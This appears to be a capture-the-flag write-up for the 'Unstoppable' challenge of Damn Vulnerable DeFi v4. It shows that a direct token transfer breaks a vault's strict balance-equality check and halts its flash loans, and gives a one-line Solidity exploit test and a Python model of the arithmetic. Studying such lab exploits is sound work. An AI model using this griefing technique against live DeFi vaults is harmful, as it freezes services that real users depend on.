# Damn Vulnerable DeFi v4 - Unstoppable

## Description

https://www.damnvulnerabledefi.xyz/challenges/unstoppable/

There's a tokenized vault with a million DVT tokens deposited. It’s offering flash loans for free, until the grace period ends.

To catch any bugs before going 100% permissionless, the developers decided to run a live beta in testnet. There's a monitoring contract to check liveness of the flashloan feature.

Starting with 10 DVT tokens in balance, show that it's possible to halt the vault. It must stop offering flash loans.

## Observation

In `UnstoppableVault.sol`, the code to focus on is:

```solidity
uint256 balanceBefore = totalAssets();
if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); // enforce ERC4626 requirement
```

Before any flash loan executes, the vault enforces a check that the vault token's `totalSupply`, converted by `convertToShares()` into an amount of `tDVT`, equals the underlying token's `totalAssets`.

## Attack

The way to break the vault is to transfer DVT tokens to it manually, so that this condition becomes true: `(convertToShares(totalSupply) != balanceBefore)`

## Test

The test code in `Unstoppable.t.sol`:

```solidity
function test_unstoppable() public checkSolvedByPlayer {
    // Send 1 token unit straight to the vault with a plain ERC20 transfer
    require(token.transfer(address(vault), 1));
}
```
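The arithmetic behind the check in the Observation section, as an added Python model that is not part of the original write-up or the challenge's code. It assumes `totalAssets()` returns the vault's token balance and that `convertToShares()` rounds down; `VaultModel` and `flash_loan_allowed_hardened` are hypothetical names, and the hardened check is one possible mitigation, not the project's fix.

```python
# Constructed model (not the challenge's Solidity): only the quantities the check reads.
# Assumptions: totalAssets() is the vault's token balance, and convertToShares()
# floors assets * totalSupply / totalAssets, as in solmate-style ERC4626 vaults.
WAD = 10**18


class VaultModel:
    def __init__(self, deposited: int):
        self.total_supply = deposited    # shares, minted 1:1 by the initial deposit
        self.token_balance = deposited   # what asset.balanceOf(vault) would return
        self.tracked_assets = deposited  # internal ledger, used by the hardened check

    def total_assets(self) -> int:
        return self.token_balance

    def convert_to_shares(self, assets: int) -> int:
        return assets * self.total_supply // self.total_assets()

    def deposit(self, assets: int) -> int:
        """Deposit through the vault: shares and both balances move together."""
        shares = self.convert_to_shares(assets)
        self.total_supply += shares
        self.token_balance += assets
        self.tracked_assets += assets
        return shares

    def direct_transfer(self, amount: int) -> None:
        """token.transfer(vault, amount): the balance grows, no shares are minted."""
        self.token_balance += amount

    def flash_loan_allowed(self) -> bool:
        """The page's check: strict equality against the live token balance."""
        return self.convert_to_shares(self.total_supply) == self.total_assets()

    def flash_loan_allowed_hardened(self) -> bool:
        """Hypothetical alternative: compare against the ledger, tolerate surplus."""
        return self.token_balance >= self.tracked_assets


if __name__ == "__main__":
    vault = VaultModel(1_000_000 * WAD)
    vault.deposit(10 * WAD)
    print("after deposit:", vault.flash_loan_allowed())
    vault.direct_transfer(1)  # one base unit sent outside deposit()
    print("after transfer:", vault.flash_loan_allowed(), vault.flash_loan_allowed_hardened())
```

A deposit through the vault keeps both sides of the comparison equal, while a single base unit sent directly leaves the converted supply one below it and `totalAssets` one above it, so the strict equality can never hold again.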